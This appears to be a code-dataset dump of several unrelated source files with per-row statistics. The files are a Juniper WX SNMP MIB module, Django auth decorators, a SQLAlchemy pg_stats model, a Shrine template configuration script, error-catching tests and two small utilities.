if mibBuilder.loadTexts: jnxWxEventWanPerfStatusChange.setStatus('current')
jnxWxEventDCQAboveHiWatermark = NotificationType((1, 3, 6, 1, 4, 1, 8239, 2, 2, 1, 3, 2, 0, 19)).setObjects(("JUNIPER-WX-COMMON-MIB", "jnxWxCommonEventDescr"))
if mibBuilder.loadTexts: jnxWxEventDCQAboveHiWatermark.setStatus('current')
jnxWxEventDCQBelowHiWatermark = NotificationType((1, 3, 6, 1, 4, 1, 8239, 2, 2, 1, 3, 2, 0, 20)).setObjects(("JUNIPER-WX-COMMON-MIB", "jnxWxCommonEventDescr"))
if mibBuilder.loadTexts: jnxWxEventDCQBelowHiWatermark.setStatus('current')
jnxWxEventPerformanceThreshCrossed = NotificationType((1, 3, 6, 1, 4, 1, 8239, 2, 2, 1, 3, 2, 0, 21)).setObjects(("JUNIPER-WX-COMMON-MIB", "jnxWxCommonEventDescr"))
if mibBuilder.loadTexts: jnxWxEventPerformanceThreshCrossed.setStatus('current')
jnxWxEventClientLinkDown = NotificationType((1, 3, 6, 1, 4, 1, 8239, 2, 2, 1, 3, 2, 0, 22)).setObjects(("JUNIPER-WX-COMMON-MIB", "jnxWxCommonEventDescr"))
if mibBuilder.loadTexts: jnxWxEventClientLinkDown.setStatus('current')
jnxWxEventClientLinkUp = NotificationType((1, 3, 6, 1, 4, 1, 8239, 2, 2, 1, 3, 2, 0, 23)).setObjects(("JUNIPER-WX-COMMON-MIB", "jnxWxCommonEventDescr"))
if mibBuilder.loadTexts: jnxWxEventClientLinkUp.setStatus('current')
mibBuilder.exportSymbols("JUNIPER-WX-MIB", jnxWxAccelAppTimeWithoutAccel=jnxWxAccelAppTimeWithoutAccel, jnxWxAsmStatsBytesOut=jnxWxAsmStatsBytesOut, jnxWxSysStatsThruputOut=jnxWxSysStatsThruputOut, jnxWxSysStats=jnxWxSysStats, jnxWxWpStatsTable=jnxWxWpStatsTable, jnxWxSysStatsPktSizeIn3=jnxWxSysStatsPktSizeIn3, jnxWxSysStatsPktsPtFilter=jnxWxSysStatsPktsPtFilter, jnxWxApp=jnxWxApp, jnxWxAppStatsAppName=jnxWxAppStatsAppName, jnxWxWpEndptEntry=jnxWxWpEndptEntry, jnxWxQosStatsPktsIn=jnxWxQosStatsPktsIn, jnxWxQosStatsBytesIn=jnxWxQosStatsBytesIn, jnxWxStatsQosEndptCount=jnxWxStatsQosEndptCount, jnxWxSysStatsPktsOutAe=jnxWxSysStatsPktsOutAe, jnxWxQos=jnxWxQos, jnxWxStatsAsmCount=jnxWxStatsAsmCount, jnxWxSysStatsBytesOutRe=jnxWxSysStatsBytesOutRe, jnxWxAsmEntry=jnxWxAsmEntry, jnxWxBurstStatsBpsPt=jnxWxBurstStatsBpsPt, jnxWxAppAggrStatsBytesOutRe=jnxWxAppAggrStatsBytesOutRe, jnxWxAccelAppNameEntry=jnxWxAccelAppNameEntry, jnxWxSysStatsBytesPtNoAe=jnxWxSysStatsBytesPtNoAe, jnxWxWpStatsLatencyAboveThresh=jnxWxWpStatsLatencyAboveThresh, jnxWxWpStatsLossCount=jnxWxWpStatsLossCount, jnxWxSysStatsPktsTpPt=jnxWxSysStatsPktsTpPt, jnxWxEventCompressionSessionOpened=jnxWxEventCompressionSessionOpened, jnxWxSysStatsPktSizeIn1=jnxWxSysStatsPktSizeIn1, jnxWxBurstStatsStartTime=jnxWxBurstStatsStartTime, jnxWxVirtEndptEntry=jnxWxVirtEndptEntry, jnxWxQosEndptIdentifier=jnxWxQosEndptIdentifier, jnxWxEventMultiPathStatusChange=jnxWxEventMultiPathStatusChange, jnxWxSysStatsPktsOfPt=jnxWxSysStatsPktsOfPt, jnxWxSysStatsPktsTpIn=jnxWxSysStatsPktsTpIn, jnxWxWpStatsLatencyCount=jnxWxWpStatsLatencyCount, jnxWxQosEndptEntry=jnxWxQosEndptEntry, jnxWxAppStatsEntry=jnxWxAppStatsEntry, jnxWxSysStatsThruputIn=jnxWxSysStatsThruputIn, jnxWxWpStatsAvgLatency=jnxWxWpStatsAvgLatency, jnxWxAppEntry=jnxWxAppEntry, jnxWxWanStatsEntry=jnxWxWanStatsEntry, jnxWxVirtEndptSubnetCount=jnxWxVirtEndptSubnetCount, jnxWxAppAppName=jnxWxAppAppName, PYSNMP_MODULE_ID=jnxWxMibModule, jnxWxSysStatsPktSizeOut2=jnxWxSysStatsPktSizeOut2, jnxWxObjs=jnxWxObjs, jnxWxEventMultiNodeMasterUp=jnxWxEventMultiNodeMasterUp, jnxWxBurstStatsBpsOut=jnxWxBurstStatsBpsOut, jnxWxAsmIndex=jnxWxAsmIndex, jnxWxEvents=jnxWxEvents, jnxWxSysStatsPktSizeIn4=jnxWxSysStatsPktSizeIn4, jnxWxWpStatsLastDown=jnxWxWpStatsLastDown, jnxWxQosStatsBytesDropped=jnxWxQosStatsBytesDropped, jnxWxConfMib=jnxWxConfMib, jnxWxQosStatsTable=jnxWxQosStatsTable, jnxWxSysStatsBytesTpPt=jnxWxSysStatsBytesTpPt, jnxWxEventCompressionBufferOverflow=jnxWxEventCompressionBufferOverflow, jnxWxAsmStatsTable=jnxWxAsmStatsTable, jnxWxQosStatsPktsDropped=jnxWxQosStatsPktsDropped, jnxWxAsmStatsPktsIn=jnxWxAsmStatsPktsIn, jnxWxAppAggrStatsEntry=jnxWxAppAggrStatsEntry, jnxWxAppStatsTable=jnxWxAppStatsTable, jnxWxSysStatsBytesOutAe=jnxWxSysStatsBytesOutAe, jnxWxSysStatsPktsInRe=jnxWxSysStatsPktsInRe, jnxWxSysStatsBytesPtFilter=jnxWxSysStatsBytesPtFilter, jnxWxEventMultiNodeMasterDown=jnxWxEventMultiNodeMasterDown, jnxWxSysStatsBytesInAe=jnxWxSysStatsBytesInAe, jnxWxStatsQosClassCount=jnxWxStatsQosClassCount, jnxWxSysStatsPktSizeOut4=jnxWxSysStatsPktSizeOut4, jnxWxSysStatsPktSizeOut5=jnxWxSysStatsPktSizeOut5, jnxWxWpStatsLossPercent=jnxWxWpStatsLossPercent, jnxWxStatsVirtEndptCount=jnxWxStatsVirtEndptCount, jnxWxWpStatsLatencyThresh=jnxWxWpStatsLatencyThresh, jnxWxQosEndptTable=jnxWxQosEndptTable, jnxWxWpStatsLatencyAboveThreshCount=jnxWxWpStatsLatencyAboveThreshCount, jnxWxSysStatsPktsOutRe=jnxWxSysStatsPktsOutRe, jnxWxEventSecondaryRegServerUnreachable=jnxWxEventSecondaryRegServerUnreachable, jnxWxEventDiskFailure=jnxWxEventDiskFailure, jnxWxEventWanPerfStatusChange=jnxWxEventWanPerfStatusChange, jnxWxSysStatsPeakRdn=jnxWxSysStatsPeakRdn, jnxWxVirtEndptIndex=jnxWxVirtEndptIndex, jnxWxWpStatsEventCount=jnxWxWpStatsEventCount, jnxWxQosClassTable=jnxWxQosClassTable, jnxWxSysStatsPktSizeOut1=jnxWxSysStatsPktSizeOut1, jnxWxAccelAppNameTable=jnxWxAccelAppNameTable, jnxWxAccelAppName=jnxWxAccelAppName, jnxWxBurstStatsBpsIn=jnxWxBurstStatsBpsIn, jnxWxAccelAppTimeWithAccel=jnxWxAccelAppTimeWithAccel, jnxWxSysStatsBytesTpOut=jnxWxSysStatsBytesTpOut, jnxWxEventEventsV2=jnxWxEventEventsV2, jnxWxWpStatsEntry=jnxWxWpStatsEntry, jnxWxEventPrimaryUpBackupDisengaged=jnxWxEventPrimaryUpBackupDisengaged, jnxWxWanStatsBytesToWan=jnxWxWanStatsBytesToWan, jnxWxEventDCQAboveHiWatermark=jnxWxEventDCQAboveHiWatermark, jnxWxAppTable=jnxWxAppTable, jnxWxVirtEndptTable=jnxWxVirtEndptTable, jnxWxWpEndptTable=jnxWxWpEndptTable, jnxWxAppStatsEstBoostBytes=jnxWxAppStatsEstBoostBytes, jnxWxMibModule=jnxWxMibModule, jnxWxEventMultiNodeLastUp=jnxWxEventMultiNodeLastUp, jnxWxAccelAppStatsTable=jnxWxAccelAppStatsTable, jnxWxEventCompressionSessionClosed=jnxWxEventCompressionSessionClosed, jnxWxQosStatsBytesOut=jnxWxQosStatsBytesOut, jnxWxEventPrimaryDownBackupEngaged=jnxWxEventPrimaryDownBackupEngaged, jnxWxAsmIpAddress=jnxWxAsmIpAddress, jnxWxSysStatsBytesOutOob=jnxWxSysStatsBytesOutOob, jnxWxWanStatsTable=jnxWxWanStatsTable, jnxWxSysStatsPktSizeIn6=jnxWxSysStatsPktSizeIn6, jnxWxSysStatsBytesOfPt=jnxWxSysStatsBytesOfPt, jnxWxAppAggrStatsBytesInPercent=jnxWxAppAggrStatsBytesInPercent, jnxWxAccelAppStatsEntry=jnxWxAccelAppStatsEntry, jnxWxWpEndptIp=jnxWxWpEndptIp, jnxWxAppStatsBytesInPercent=jnxWxAppStatsBytesInPercent, jnxWxStatsAppCount=jnxWxStatsAppCount, jnxWxAsmStatsPktsOut=jnxWxAsmStatsPktsOut, jnxWxWanStatsBytesFromWan=jnxWxWanStatsBytesFromWan, jnxWxEventDecompressionSessionClosed=jnxWxEventDecompressionSessionClosed, jnxWxAsmTable=jnxWxAsmTable, jnxWxSysStatsPktSizeOut3=jnxWxSysStatsPktSizeOut3, jnxWxSysStatsBytesInRe=jnxWxSysStatsBytesInRe, jnxWxQosStatsPktsOut=jnxWxQosStatsPktsOut, jnxWxStatsUpdateTime=jnxWxStatsUpdateTime, jnxWxSysStatsPktsInAe=jnxWxSysStatsPktsInAe, jnxWxAppStatsBytesOut=jnxWxAppStatsBytesOut, jnxWxAppStatsBytesIn=jnxWxAppStatsBytesIn, jnxWxAppStatsAccelBytesIn=jnxWxAppStatsAccelBytesIn, jnxWxAsmStatsBytesIn=jnxWxAsmStatsBytesIn, jnxWxSysStatsBytesTpIn=jnxWxSysStatsBytesTpIn, jnxWxEventEvents=jnxWxEventEvents, jnxWxBurstStats=jnxWxBurstStats, jnxWxSysStatsPktSizeOut6=jnxWxSysStatsPktSizeOut6, jnxWxAppIndex=jnxWxAppIndex, jnxWxEventDCQBelowHiWatermark=jnxWxEventDCQBelowHiWatermark, jnxWxWpEndptIndex=jnxWxWpEndptIndex, jnxWxVirtEndptName=jnxWxVirtEndptName, jnxWxEventObjs=jnxWxEventObjs, jnxWxEventClientLinkDown=jnxWxEventClientLinkDown, jnxWxMib=jnxWxMib, jnxWxQosEndptIndex=jnxWxQosEndptIndex, jnxWxAccelAppIndex=jnxWxAccelAppIndex, jnxWxWpStatsReturnCount=jnxWxWpStatsReturnCount, jnxWxSysStatsPktsTpOut=jnxWxSysStatsPktsTpOut, jnxWxAppStatsBytesOutWxc=jnxWxAppStatsBytesOutWxc, jnxWxStatsAccelAppCount=jnxWxStatsAccelAppCount, jnxWxWpStatsMinuteCount=jnxWxWpStatsMinuteCount, jnxWxAsm=jnxWxAsm, jnxWxAppStatsActiveSessionTime=jnxWxAppStatsActiveSessionTime, jnxWxEventDecompressionSessionOpened=jnxWxEventDecompressionSessionOpened, jnxWxSysStatsPktSizeIn2=jnxWxSysStatsPktSizeIn2, jnxWxEventPrimaryRegServerUnreachable=jnxWxEventPrimaryRegServerUnreachable, jnxWxQosClassIndex=jnxWxQosClassIndex, jnxWxEventClientLinkUp=jnxWxEventClientLinkUp, jnxWxAppAggrStatsTable=jnxWxAppAggrStatsTable, jnxWxAppAggrStatsBytesInRe=jnxWxAppAggrStatsBytesInRe, jnxWxSysStatsPktsPtNoAe=jnxWxSysStatsPktsPtNoAe, jnxWxQosStatsEntry=jnxWxQosStatsEntry, jnxWxEventRipAuthFailure=jnxWxEventRipAuthFailure, jnxWxStatsWpEndptCount=jnxWxStatsWpEndptCount, jnxWxWpStatsDiversionCount=jnxWxWpStatsDiversionCount, jnxWxEventMultiNodeLastDown=jnxWxEventMultiNodeLastDown, jnxWxQosClassName=jnxWxQosClassName, jnxWxEventPrimaryDownBackupEngageFailed=jnxWxEventPrimaryDownBackupEngageFailed, jnxWxSysStatsPktSizeIn5=jnxWxSysStatsPktSizeIn5, jnxWxWpStatsUnavailableCount=jnxWxWpStatsUnavailableCount, jnxWxEventPerformanceThreshCrossed=jnxWxEventPerformanceThreshCrossed, jnxWxQosClassEntry=jnxWxQosClassEntry, jnxWxAsmStatsEntry=jnxWxAsmStatsEntry, jnxWxWanPerf=jnxWxWanPerf)
| 117.216292 | 7,837 | 0.767835 | 4,695 | 41,729 | 6.824068 | 0.067093 | 0.012485 | 0.015637 | 0.020725 | 0.395768 | 0.384719 | 0.304816 | 0.277599 | 0.226692 | 0.16689 | 0 | 0.085295 | 0.086606 | 41,729 | 355 | 7,838 | 117.546479 | 0.755293 | 0.007884 | 0 | 0 | 0 | 0 | 0.099756 | 0.026455 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.025862 | 0 | 0.025862 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
26bca4635602b2dea4dadcc1b88a6836226fb74e | 2,524 | py | Python | backend/tensor_site/decorators.py | b3none/Tensor | 6c70c7d3ade6eabe4162d0b9eef0923c79ea1eba | [
"MIT"
] | null | null | null | backend/tensor_site/decorators.py | b3none/Tensor | 6c70c7d3ade6eabe4162d0b9eef0923c79ea1eba | [
"MIT"
] | null | null | null | backend/tensor_site/decorators.py | b3none/Tensor | 6c70c7d3ade6eabe4162d0b9eef0923c79ea1eba | [
"MIT"
] | 3 | 2021-09-06T18:01:52.000Z | 2021-10-18T02:49:53.000Z | # Tout ce code est un snippet volé sur plusieurs threads Stackoverflow
# Il permet de créer un décorateur qui vérifie si un utilisateur est bien identifié,
# et le redirige vers la page de login sinon. Django ne fait pas cette dernière partie seul...
try:
from functools import wraps
except ImportError:
from django.utils.functional import wraps # Python 2.4 fallback.
from django.contrib import messages
from django.contrib.auth import REDIRECT_FIELD_NAME
from django.contrib.auth.decorators import login_required
from steam.steamid import SteamID
from sourcebans.models import SbAdmins
default_message = "You must login first"
def user_passes_test(test_func, message=default_message):
"""
Decorator for views that checks that the user passes the given test,
setting a message in case of no success. The test should be a callable
that takes the user object and returns True if the user passes.
"""
def decorator(view_func):
def _wrapped_view(request, *args, **kwargs):
if not test_func(request.user):
messages.error(request, message)
return view_func(request, *args, **kwargs)
return _wrapped_view
return decorator
def login_required_message(function=None, message=default_message):
"""
Decorator for views that checks that the user is logged in, redirecting
to the log-in page if necessary.
"""
actual_decorator = user_passes_test(
lambda u: u.is_authenticated,
message=message,
)
if function:
return actual_decorator(function)
return actual_decorator
def login_required_messsage_and_redirect(function=None, redirect_field_name=REDIRECT_FIELD_NAME, login_url=None, message=default_message):
if function:
return login_required_message(
login_required(function, redirect_field_name, login_url),
message
)
return lambda deferred_function: login_required_message_and_redirect(deferred_function, redirect_field_name, login_url, message)
def admin_required(function=None, redirect_field_name=REDIRECT_FIELD_NAME, login_url=None):
"""
Decorator for views that checks that the user is logged in, redirecting
to the log-in page if necessary.
"""
def is_admin(u):
if u.is_authenticated:
steamid = SteamID(u.steamid).as_steam2
Results = SbAdmins.objects.get(authid=steamid)
if Results or u.is_superuser:
return True
return False
actual_decorator = user_passes_test(
lambda u: is_admin(u)
)
if function:
return actual_decorator(function)
return actual_decorator | 32.779221 | 138 | 0.765055 | 357 | 2,524 | 5.226891 | 0.364146 | 0.048767 | 0.063773 | 0.062165 | 0.340836 | 0.340836 | 0.340836 | 0.259378 | 0.259378 | 0.19507 | 0 | 0.001435 | 0.171553 | 2,524 | 77 | 139 | 32.779221 | 0.890961 | 0.269414 | 0 | 0.191489 | 0 | 0 | 0.011111 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.148936 | false | 0.06383 | 0.170213 | 0 | 0.553191 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 2 |
26c4cd3412477aa9a4e2d8f9807e5a95e1651606 | 2,136 | py | Python | navigator/models.py | nmussat/Navigator | 38bc8cb31367bfc9ebc780c99ab40269091508f6 | [
"MIT"
] | null | null | null | navigator/models.py | nmussat/Navigator | 38bc8cb31367bfc9ebc780c99ab40269091508f6 | [
"MIT"
] | null | null | null | navigator/models.py | nmussat/Navigator | 38bc8cb31367bfc9ebc780c99ab40269091508f6 | [
"MIT"
] | 1 | 2021-10-07T19:56:40.000Z | 2021-10-07T19:56:40.000Z | #!/usr/bin/env python
# -*- coding: utf-8 -*-
from __future__ import absolute_import, division, print_function, unicode_literals
from collections import OrderedDict
from flask.ext.sqlalchemy import SQLAlchemy
from sqlalchemy.dialects import postgresql
from sqlalchemy.types import TypeDecorator
db = SQLAlchemy()
class AnyArray(TypeDecorator):
impl = db.TEXT
def process_bind_param(self, value, dialect):
if value is None:
return value
if not value:
return '{}'
return '{{"{}"}}'.format('","'.join(value))
def process_result_value(self, value, dialect):
if value is None:
return value
if isinstance(value, list):
return value
if not value:
return []
# TODO: Value should be Unicode already
value = value.decode('utf-8')
# TODO: Enhance field decoding (eg. core_user.created)
return value.strip('{}"').split(',')
# TODO: make the model read-only
class PGStats(db.Model):
__tablename__ = 'pg_stats'
schema = db.Column('schemaname', db.TEXT(), primary_key=True)
table = db.Column('tablename', db.TEXT(), primary_key=True)
column = db.Column('attname', db.TEXT(), primary_key=True)
inherited = db.Column('inherited', db.BOOLEAN())
null_frac = db.Column('null_frac', db.REAL())
avg_width = db.Column('avg_width', db.INTEGER())
n_distinct = db.Column('n_distinct', db.REAL())
most_common_vals = db.Column('most_common_vals', AnyArray())
most_common_freqs = db.Column('most_common_freqs', AnyArray())
histogram_bounds = db.Column('histogram_bounds', AnyArray())
correlation = db.Column('correlation', db.REAL())
most_common_elems = db.Column('most_common_elems', AnyArray())
most_common_elem_freqs = db.Column('most_common_elem_freqs', postgresql.ARRAY(db.REAL))
elem_count_histogram = db.Column('elem_count_histogram', postgresql.ARRAY(db.REAL))
def to_dict(self):
result = OrderedDict()
for key in self.__mapper__.columns.keys():
result[key] = getattr(self, key)
return result
| 34.451613 | 91 | 0.663858 | 268 | 2,136 | 5.085821 | 0.399254 | 0.082172 | 0.035216 | 0.052825 | 0.169479 | 0.091709 | 0.061629 | 0.061629 | 0.061629 | 0.061629 | 0 | 0.001181 | 0.207397 | 2,136 | 61 | 92 | 35.016393 | 0.803898 | 0.076779 | 0 | 0.159091 | 0 | 0 | 0.107833 | 0.01119 | 0 | 0 | 0 | 0.016393 | 0 | 1 | 0.068182 | false | 0 | 0.113636 | 0 | 0.772727 | 0.022727 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 2 |
26dd9d8d667f977ffc2bddba99241cfb4d40b617 | 2,518 | py | Python | configure_templates.py | kumc-bmi/shrine-docker-image | a9f917912e7c4178157518d7b241ee11c096a64d | [
"BSD-3-Clause"
] | null | null | null | configure_templates.py | kumc-bmi/shrine-docker-image | a9f917912e7c4178157518d7b241ee11c096a64d | [
"BSD-3-Clause"
] | null | null | null | configure_templates.py | kumc-bmi/shrine-docker-image | a9f917912e7c4178157518d7b241ee11c096a64d | [
"BSD-3-Clause"
] | null | null | null | #!/usr/bin/python3
import os
from jinja2 import Environment, FileSystemLoader
file_loader = FileSystemLoader('/opt/templates')
env = Environment(loader=file_loader)
template = env.get_template('shrine.conf.j2')
output = template.render(shrineDatabaseType=os.environ['SHRINE_DB_TYPE'],
hive_password=os.environ['SHRINE_HIVE_PASSWORD'],
keystore_password=os.environ['SHRINE_KEYSTORE_PASSWORD']) # noqa
f = open("/usr/local/tomcat/lib/shrine.conf", "w")
f.write(output)
f.close()
template = env.get_template('context.xml.j2')
# there must be a better way to do this
output = template.render(shrineDatabaseType=os.environ['SHRINE_DB_TYPE'],
problemDB_user=os.environ['SHRINE_PROBLEMDB_USER'], # noqa
problemDB_pass=os.environ['SHRINE_PROBLEMDB_PASS'], # noqa
problemDB_driver=os.environ['SHRINE_PROBLEMDB_DRIVER'], # noqa
problemDB_url=os.environ['SHRINE_PROBLEMDB_URL'], # noqa
shrineDB_user=os.environ['SHRINE_SHRINEDB_USER'], # noqa
shrineDB_pass=os.environ['SHRINE_SHRINEDB_PASS'], # noqa
shrineDB_driver=os.environ['SHRINE_SHRINEDB_DRIVER'], # noqa
shrineDB_url=os.environ['SHRINE_SHRINEDB_URL'], # noqa
adapterAuditDB_user=os.environ['SHRINE_ADAPTERAUDITDB_USER'], # noqa
adapterAuditDB_pass=os.environ['SHRINE_ADAPTERAUDITDB_PASS'], # noqa
adapterAuditDB_driver=os.environ['SHRINE_ADAPTERAUDITDB_DRIVER'], # noqa
adapterAuditDB_url=os.environ['SHRINE_ADAPTERAUDITDB_URL'], # noqa
qepAuditDB_user=os.environ['SHRINE_QEPAUDITDB_USER'], # noqa
qepAuditDB_pass=os.environ['SHRINE_QEPAUDITDB_PASS'], # noqa
qepAuditDB_driver=os.environ['SHRINE_QEPAUDITDB_DRIVER'], # noqa
qepAuditDB_url=os.environ['SHRINE_QEPAUDITDB_URL'], # noqa
stewardDB_user=os.environ['SHRINE_STEWARDDB_USER'], # noqa
stewardDB_pass=os.environ['SHRINE_STEWARDDB_PASS'], # noqa
stewardDB_driver=os.environ['SHRINE_STEWARDDB_DRIVER'], # noqa
stewardDB_url=os.environ['SHRINE_STEWARDDB_URL']
)
f = open("/usr/local/tomcat/conf/context.xml", "w")
f.write(output)
f.close()
| 55.955556 | 97 | 0.619539 | 263 | 2,518 | 5.65019 | 0.21673 | 0.145357 | 0.242261 | 0.06393 | 0.130552 | 0.10498 | 0.079408 | 0.079408 | 0.079408 | 0 | 0 | 0.002188 | 0.274027 | 2,518 | 44 | 98 | 57.227273 | 0.810722 | 0.061557 | 0 | 0.162162 | 0 | 0 | 0.268261 | 0.186672 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0.189189 | 0.054054 | 0 | 0.054054 | 0 | 0 | 0 | 0 | null | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 2 |
26ee085bd32572ff40cf2197f756c83189545036 | 2,314 | py | Python | modules/tests/photons_transport_tests/test_catch_errors.py | Djelibeybi/photons | bc0aa91771d8e88fd3c691fb58f18cb876f292ec | [
"MIT"
] | 51 | 2020-07-03T08:34:48.000Z | 2022-03-16T10:56:08.000Z | modules/tests/photons_transport_tests/test_catch_errors.py | delfick/photons | bc0aa91771d8e88fd3c691fb58f18cb876f292ec | [
"MIT"
] | 81 | 2020-07-03T08:13:59.000Z | 2022-03-31T23:02:54.000Z | modules/tests/photons_transport_tests/test_catch_errors.py | Djelibeybi/photons | bc0aa91771d8e88fd3c691fb58f18cb876f292ec | [
"MIT"
] | 8 | 2020-07-24T23:48:20.000Z | 2021-05-24T17:20:16.000Z | # coding: spec
from photons_transport import catch_errors
from photons_app.errors import RunErrors, PhotonsAppError
from photons_app import helpers as hp
from delfick_project.errors_pytest import assertRaises
describe "throw_error":
it "passes on errors if error_catcher is a callable":
es = []
def ec(e):
es.append(e)
e1 = ValueError("NOPE")
e2 = ValueError("NUP")
with catch_errors(ec) as error_catcher:
hp.add_error(error_catcher, e1)
raise e2
assert error_catcher is ec
assert es == [e1, e2]
it "passes on errors if error_catcher is a list":
es = []
e1 = ValueError("NOPE")
e2 = ValueError("NUP")
with catch_errors(es) as error_catcher:
hp.add_error(error_catcher, e1)
raise e2
assert error_catcher is es
assert es == [e1, e2]
it "does nothing if no errors":
with catch_errors():
pass
es = []
def ec(e):
es.append(e)
with catch_errors(ec):
pass
assert es == []
with catch_errors(es):
pass
assert es == []
it "throws the error if just one":
with assertRaises(ValueError, "NOPE"):
with catch_errors():
raise ValueError("NOPE")
it "merges multiple of the same error together":
e1 = PhotonsAppError("yeap", a=1)
e2 = PhotonsAppError("yeap", a=1)
with assertRaises(PhotonsAppError, "yeap", a=1):
with catch_errors() as ec:
hp.add_error(ec, e1)
raise e2
with assertRaises(PhotonsAppError, "yeap", a=1):
with catch_errors() as ec:
hp.add_error(ec, e1)
hp.add_error(ec, e2)
it "combines multiple of different errors into a RunErrors":
e1 = PhotonsAppError("yeap", a=1)
e2 = PhotonsAppError("yeap", b=1)
with assertRaises(RunErrors, _errors=[e1, e2]):
with catch_errors() as ec:
hp.add_error(ec, e1)
raise e2
with assertRaises(RunErrors, _errors=[e2, e1]):
with catch_errors() as ec:
hp.add_error(ec, e2)
hp.add_error(ec, e1)
| 26 | 65 | 0.554451 | 283 | 2,314 | 4.409894 | 0.222615 | 0.096955 | 0.120192 | 0.057692 | 0.5625 | 0.516026 | 0.516026 | 0.488782 | 0.418269 | 0.266827 | 0 | 0.022667 | 0.351772 | 2,314 | 88 | 66 | 26.295455 | 0.809333 | 0.005186 | 0 | 0.634921 | 0 | 0 | 0.12913 | 0 | 0 | 0 | 0 | 0 | 0.190476 | 0 | null | null | 0.079365 | 0.063492 | null | null | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 2 |
26f4eadc70e27aa1e98f38da3c8d30e443528f7e | 620 | py | Python | wonderbits/WBUltrasonic.py | daejong123/wb-py-sdk | f77edb435a22bf6d3d37e0ad716117b8680c544b | [
"MIT"
] | 1 | 2019-05-09T07:15:43.000Z | 2019-05-09T07:15:43.000Z | wonderbits/WBUltrasonic.py | daejong123/wb-py-sdk | f77edb435a22bf6d3d37e0ad716117b8680c544b | [
"MIT"
] | null | null | null | wonderbits/WBUltrasonic.py | daejong123/wb-py-sdk | f77edb435a22bf6d3d37e0ad716117b8680c544b | [
"MIT"
] | null | null | null | from .wbits import Wonderbits
def _format_str_type(x):
if isinstance(x, str):
x = str(x).replace('"', '\\"')
x = "\"" + x + "\""
return x
class Ultrasonic(Wonderbits):
def __init__(self, index = 1):
Wonderbits.__init__(self)
self.index = index
def register_distance(self, cb):
self._register_event('ultrasonic{}'.format(self.index), 'distance', cb)
def get_distance(self):
"""
获取超声波检测的距离值(cm):rtype: float
"""
command = 'ultrasonic{}.get_distance()'.format(self.index)
return self._get_command(command)
| 23.846154 | 79 | 0.579032 | 69 | 620 | 4.942029 | 0.42029 | 0.105572 | 0.029326 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.002208 | 0.269355 | 620 | 26 | 80 | 23.846154 | 0.750552 | 0.045161 | 0 | 0 | 0 | 0 | 0.103691 | 0.047452 | 0 | 0 | 0 | 0 | 0 | 1 | 0.266667 | false | 0 | 0.066667 | 0 | 0.533333 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 2 |
26f9a11a19644550efcba31e08b36d91ed82c4d9 | 124 | py | Python | experiments/Catalan.py | johnpaulguzman/Algorithm-Analyzer | e93abfb51f2f67b6df1af8d95cc6855ad7de69f2 | [
"MIT"
] | null | null | null | experiments/Catalan.py | johnpaulguzman/Algorithm-Analyzer | e93abfb51f2f67b6df1af8d95cc6855ad7de69f2 | [
"MIT"
] | null | null | null | experiments/Catalan.py | johnpaulguzman/Algorithm-Analyzer | e93abfb51f2f67b6df1af8d95cc6855ad7de69f2 | [
"MIT"
] | null | null | null | def f(n):
if n <=0:
return 1
res = 0
for i in range(n):
res += f(i) * f(n-i-1)
return res | 17.714286 | 30 | 0.403226 | 24 | 124 | 2.083333 | 0.5 | 0.08 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.057971 | 0.443548 | 124 | 7 | 31 | 17.714286 | 0.666667 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.142857 | false | 0 | 0 | 0 | 0.428571 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
26fa4ab137e1cd66b58f73571d25f8fb1027d414 | 312 | py | Python | tests/test_delattribute.py | pylover/pymlconf | 4111ed84b23201957ee789b58e6818f330eeb28b | [
"MIT"
] | 36 | 2015-02-09T14:20:32.000Z | 2020-12-18T03:01:29.000Z | tests/test_delattribute.py | pylover/pymlconf | 4111ed84b23201957ee789b58e6818f330eeb28b | [
"MIT"
